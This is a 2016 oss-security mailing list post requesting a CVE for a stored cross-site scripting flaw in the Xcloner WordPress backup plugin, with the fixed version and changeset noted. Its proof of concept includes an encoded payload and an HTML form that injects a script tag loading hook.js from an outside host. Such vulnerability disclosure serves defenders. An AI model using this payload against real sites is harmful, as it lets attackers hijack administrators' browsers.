[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] CVE request : a stored XSS in Xcloner for wordpress
From:       limingxing <limingxing () 360 ! cn>
Date:       2016-07-27 2:35:46
Message-ID: 3626D6E697A150459C44C0E5D8D8D00E0DBE8BDF () EX02 ! corp ! qihoo ! net
[Download RAW message or body]

Hi

     I found a stored XSS in Xcloner for wordpress.  The XSS filter can 
be bypass.

     Here is the plugin page
     https://wordpress.org/plugins/xcloner-backup-and-restore/

     PoC

     In the "Corn setting" page(URL is 
"http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config"), 
set the "Backup name" (corn_bname) like 
"1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on"

     <html>
         <form 
action="http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config" 
method="post">
             <input type="hidden" name="cron_bname" 
value="1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on" 
/>
             <input type="submit" name="submit">
         </form>
     </html>


     Fix way
     Update to version 3.1.5

     Change

     https://plugins.trac.wordpress.org/changeset/1456784


     Could you assign a CVE ID for it?

Chen Ruiqi
Codesafe Team=
[prev in list] [next in list] [prev in thread] [next in thread]